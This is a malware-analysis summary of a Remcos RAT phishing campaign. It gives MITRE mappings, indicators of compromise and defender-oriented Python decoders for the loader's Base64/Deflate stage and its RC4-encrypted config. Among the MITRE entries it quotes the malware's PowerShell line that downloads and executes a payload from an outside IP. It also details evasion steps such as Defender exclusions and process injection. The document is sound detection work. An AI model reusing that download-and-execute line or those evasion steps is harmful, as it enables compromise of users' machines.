Keypoints
- Attack begins with a phishing email carrying a ZIP/RAR attachment (e.g., “August 2023 Statement of Account.z”) that contains a heavily obfuscated VBS script.
- The VBS deobfuscates and executes a PowerShell command that downloads an obfuscated PowerShell payload from http://212.192.219.52/87656.txt.
- The downloaded PowerShell uses variable-based obfuscation, Base64 decode and Deflate decompression to reveal a second PowerShell script containing a base64-encoded PE and code to inject it into a spawned process (Wintask.exe).
- Injected PE is a .NET MSIL loader which RC4-decrypts an embedded DLL (dGXsvRf.dll) that is a SykCrypter stage; SykCrypter XOR/RC4-decrypts and deflates the final payload in memory.
- Malware implements persistence (shortcut .pif + Registry Run key), adds Windows Defender exclusions, creates a mutex (Rmc-OB0RTV), and contains configuration with Remcos C2 (172.96.14.18:2404).
- Process injection and reflective/inline loading are used throughout (WriteProcessMemory/ResumeThread for injection, NewLateBinding.LateGet for reflective loading), so most stages execute only in memory and never touch disk as a recognisable PE.
MITRE Techniques
- [T1566] Phishing – Delivery via email with archive attachment containing an obfuscated VBS. (‘McAfee labs observed a Remcos RAT campaign where malicious VBS files were delivered via phishing email.’)
- [T1204] User Execution – Victim is induced to open the ZIP/RAR and execute the VBS. (‘A phishing email contained a ZIP/RAR attachment. Inside this ZIP, was a heavily obfuscated VBS file.’)
- [T1105] Ingress Tool Transfer – Downloader fetches 87656.txt via HTTP using Invoke-WebRequest. (‘(Invoke-WebRequest ‘http://212.192.219.52/87656.txt’ -UseBasicParsing).Content).Invoke();’)
- [T1059.001] Command and Scripting Interpreter: PowerShell – VBS launches a PowerShell command to download and execute the payload. (‘The purpose of this VBS script is to download a payload using PowerShell.’)
- [T1027] Obfuscated Files or Information – Multiple layers of obfuscation and random strings hide the true execution chain. (‘Remcos incorporates different obfuscation and anti-debugging techniques to evade detection.’)
- [T1140] Deobfuscate/Decode Files or Information – PowerShell decodes Base64 then decompresses with Deflate to reveal another script/PE. (‘PowerShell script decodes the data using the Base64String algorithm and decompresses the decoded data using the Deflate Stream algorithm.’)
- [T1620] Reflective Code Loading – Decrypted DLL is loaded and executed in memory via NewLateBinding.LateGet with load parameter (reflective/in-memory execution). (‘To execute the decrypted DLL in memory, the malware uses reflecting code loading.’)
- [T1055] Process Injection – PowerShell creates Wintask.exe and injects the decoded PE into that process; later stages use WriteProcessMemory and ResumeThread. (‘Wintask.exe is launched as a new process by the PowerShell script and the aforementioned PE file is injected in the Wintask.exe process.’ / ‘WriteProcessMemory … ResumeThread.’)
- [T1562.001] Impair Defenses: Disable or Modify Security Tools – Malware adds Windows Defender exclusions to evade detection. (‘Windows Defender exclusions are added.’)
- [T1547.001] Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder – Persistence via shortcut (.pif) in Documents and a Registry Run key entry. (‘creates a shortcut file in the Documents folder with a .pif extension, and creates a registry Run key entry.’)
Indicators of Compromise
- [IP Address/URL] Downloader/C2 – http://212.192.219.52/87656.txt (PowerShell downloader), 172.96.14.18:2404 (Remcos C2)
- [File names] Payload stages and drop locations – 87656.txt (obfuscated PowerShell), dGXsvRf.dll (SykCrypter DLL), Wintask.exe (spawned process), and file copy to %appdata% via cmd
- [Mutex] Runtime behavior – Rmc-OB0RTV (mutex created by malware for instance control)
- [SHA256 hashes] Samples observed – 0b3d65305edc50d3882973e47e9fbf4abc1f04eaecb13021f434eba8adf80b67 (VBS), 3ed5729dc3f12a479885e434e0bdb7722f8dd0c0b8b27287111564303b98036c (PowerShell), and 4 more hashes
- [Configuration resource] Encrypted settings – RCData “SETTINGS” (RC4-encrypted Remcos config containing C2 IP, port 2404, and mutex)
The attack flow is: a phishing email delivers a ZIP/RAR that contains an obfuscated VBS script; the VBS strips its own junk comments and garbage, deobfuscates a command string, and executes a PowerShell one-liner to fetch http://212.192.219.52/87656.txt. The first-stage PowerShell obfuscates its own invoke-expression (iex) call, then Base64-decodes and Deflate-decompresses a second PowerShell script, which carries a base64-encoded PE plus the routines that inject it into a newly spawned process (Wintask.exe).
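The Base64-then-Deflate layer in that chain is the one most analysts end up reversing by hand. The following is an added example written for this page (not code from McAfee or from the malware) that undoes it with the Python standard library and then hunts the recovered script for the embedded PE: .NET's DeflateStream produces raw DEFLATE with no zlib header, so the inflate call needs a negative window size. The second-stage script, the fake PE and the variable names are constructed stand-ins; only the Base64 + DeflateStream layering and the Wintask.exe process name come from the page.

```python
import base64
import binascii
import re
import zlib


def decode_stage(b64_text: str) -> bytes:
    """Reverse the loader's Base64 -> DeflateStream layering.

    .NET DeflateStream emits raw DEFLATE with no zlib header, so inflate
    needs wbits=-15; a plain zlib.decompress(raw) fails with
    "incorrect header check" on this data.
    """
    raw = base64.b64decode("".join(b64_text.split()))
    return zlib.decompress(raw, wbits=-zlib.MAX_WBITS)


# A long run of Base64 characters is the usual carrier for the injected PE.
B64_RUN = re.compile(r"[A-Za-z0-9+/]{64,}={0,2}")


def extract_embedded_pe(script: str) -> list:
    """Return every Base64 literal in the script that decodes to a PE (MZ header)."""
    found = []
    for m in B64_RUN.finditer(script):
        try:
            blob = base64.b64decode(m.group(0), validate=True)
        except (binascii.Error, ValueError):
            continue  # not a clean Base64 run (e.g. a random identifier)
        if blob[:2] == b"MZ":
            found.append(blob)
    return found


def build_sample_stage() -> str:
    """Constructed input: a stand-in second-stage script holding a fake 100-byte
    'PE', raw-deflated and Base64-encoded the way the first stage carries it."""
    fake_pe = b"MZ\x90\x00" + b"\x00" * 60 + b"PE\x00\x00" + b"\x00" * 32
    stage2 = (
        "$pe = [Convert]::FromBase64String('"
        + base64.b64encode(fake_pe).decode()
        + "')\n$proc = Start-Process Wintask.exe -PassThru\n"
    )
    comp = zlib.compressobj(9, zlib.DEFLATED, -zlib.MAX_WBITS)  # raw DEFLATE
    return base64.b64encode(comp.compress(stage2.encode()) + comp.flush()).decode()


if __name__ == "__main__":
    stage2 = decode_stage(build_sample_stage()).decode()
    print(stage2)
    for pe in extract_embedded_pe(stage2):
        print(f"embedded PE: {len(pe)} bytes, starts {pe[:2]!r}")
```

When running this against a real 87656.txt stage, feed `decode_stage` only the Base64 argument that the script passes to `FromBase64String`, since the surrounding variable-renaming obfuscation is not part of the encoded blob; if a sample uses GZipStream instead of DeflateStream, the same call works with `wbits=zlib.MAX_WBITS | 16`.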
The injected PE is a .NET MSIL loader that reverses and RC4-decrypts a large embedded blob to produce dGXsvRf.dll (a SykCrypter stage). SykCrypter XOR/RC4-decrypts its embedded payloads, uses a secondary .NET DLL to deflate data, and then performs reflective/inline loading to execute the final components in memory. The chain also modifies Defender exclusions and drops a persistent copy (shortcut .pif + Registry Run key) and creates a mutex (Rmc-OB0RTV).
The final payload is a Visual C++ executable whose RCData “SETTINGS” contains an RC4-encrypted Remcos configuration (key length 76 bytes) that reveals the C2 172.96.14.18 on port 2404 and enables typical Remcos capabilities (credential/browser/crypto wallet harvesting, remote access, and acting as a dropper). Detection and response should focus on the downloader URL/IP, the listed hashes, the mutex, unusual PowerShell decode/decompress activity, creation of Defender exclusions, and the .pif/Run key persistence artifacts.
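Both the SykCrypter stage and the final RCData “SETTINGS” resource rely on RC4, so one decryptor covers the configuration extraction the paragraphs above describe. The block below is an added example for this page (not McAfee's tooling and not the malware's own code): it implements RC4, splits a SETTINGS blob laid out as a one-byte key length followed by the key and the ciphertext (that layout, and the 76-byte key length, are assumptions for the sample, the latter taken from the page), and pulls the C2 host:port and the Rmc- mutex out of the plaintext. The key bytes, the config body and its '|' delimiter are constructed; only the C2 172.96.14.18:2404 and the mutex Rmc-OB0RTV come from the page.

```python
import re


def rc4(key: bytes, data: bytes) -> bytes:
    """Textbook RC4 (KSA + PRGA); the same call encrypts and decrypts."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def parse_settings(resource: bytes) -> tuple:
    """Split a SETTINGS blob assumed to be [key_len:1][key][rc4_ciphertext]
    and return (key, decrypted_config)."""
    if not resource:
        raise ValueError("empty resource")
    key_len = resource[0]
    key = resource[1:1 + key_len]
    if len(key) != key_len:
        raise ValueError("resource shorter than its declared key length")
    return key, rc4(key, resource[1 + key_len:])


C2_RE = re.compile(rb"\b(\d{1,3}(?:\.\d{1,3}){3}):(\d{1,5})\b")
MUTEX_RE = re.compile(rb"Rmc-[A-Za-z0-9]+")


def extract_iocs(plaintext: bytes) -> dict:
    """Pull C2 host:port pairs and Rmc- mutex names out of the decrypted config."""
    return {
        "c2": [(host.decode(), int(port)) for host, port in C2_RE.findall(plaintext)],
        "mutex": [m.decode() for m in MUTEX_RE.findall(plaintext)],
    }


# Constructed sample: a deterministic 76-byte key and a config body carrying the
# page's C2 and mutex. The '|' field separator is an assumption of this example.
SAMPLE_KEY = bytes((i * 7 + 13) & 0xFF for i in range(76))
SAMPLE_CONFIG = b"172.96.14.18:2404|Rmc-OB0RTV|"


def build_sample_resource() -> bytes:
    """Assemble a SETTINGS-style blob from the constructed key and config."""
    return bytes([len(SAMPLE_KEY)]) + SAMPLE_KEY + rc4(SAMPLE_KEY, SAMPLE_CONFIG)


if __name__ == "__main__":
    key, cfg = parse_settings(build_sample_resource())
    print(f"key length {len(key)}, config {cfg!r}")
    print(extract_iocs(cfg))
```

On a real sample, dump the RCData resource named SETTINGS with a PE parser (pefile's resource tree, for instance) and pass the raw bytes to `parse_settings`; a first byte of 76 matches the key length reported for this campaign, and a decrypted body that fails both regexes is the first sign that the layout assumption does not hold for that build.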
Read more: https://www.mcafee.com/blogs/other-blogs/mcafee-labs/peeling-back-the-layers-of-remcosrat-malware/